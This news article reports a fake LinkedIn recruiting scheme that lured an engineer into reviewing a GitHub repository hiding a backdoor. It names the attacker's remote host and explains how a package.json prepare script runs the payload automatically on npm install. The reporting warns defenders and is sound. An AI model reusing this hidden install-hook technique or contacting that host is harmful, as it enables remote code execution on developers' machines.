The Fake Interview on LinkedIn Hides Malware: 'They Asked Me to Analyze the Code'
The Fake Interview on LinkedIn Hides Malware: 'They Asked Me to Analyze the Code'
A computer engineer detected and blocked a cyber intrusion attempt orchestrated through a fake job offer on LinkedIn. The malicious actors, posing as recruiters from a startup operating in the cryptocurrency sector, contacted the professional requesting a technical review of a source code hosted on a public GitHub repository.
The trap was hidden behind the request to analyze a supposed issue related to deprecated Node modules. A thorough analysis of the code, conducted within a protected and isolated virtual environment on a Hetzner VPS server, instead revealed the presence of a backdoor designed to take control of the victim's machine. As explained by the victim himself, Roman Imankulov, in a blog post, the malicious architecture resided in the file app/test/index.js, disguised among about 250 lines of code structured to appear as a common software test suite.
Malware via LinkedIn: The Automatic Activation Mechanism via NPM
Examining the script reveals how the application reconstructs a specific web address by combining different string fragments: the defined values include the HTTPS protocol, the store domain, the rest-icon-handler subdomain, and the path /icons/77. Once the connection with the remote host https://rest-icon-handler.store/icons/77 is established, the code hidden among commented test lines executes any payload sent from the server directly on the local system.
The activation of the threat does not require manual initiation of the tests. The main file app/index.js directly calls the malicious module. However, the real crux of the attack lies in the configuration of the package.json file, where the prepare script is associated with the command node app/index.js. Since the NPM package manager automatically executes the prepare instructions right after completing npm install, the infection is triggered the very moment the developer downloads the project's dependencies. The invitation to check the deprecated modules served as bait to force the execution of this command.
The social engineering operation exploits multiple identity thefts to bypass the victim's defenses. The GitHub history showed 39 commits entirely attributed to the real profile of a full-stack developer unrelated to the incident, who confirmed that he had already suffered the cloning of his identity in the past. The malicious software has been reported to GitHub, and the fake account to LinkedIn, but the code remains accessible online.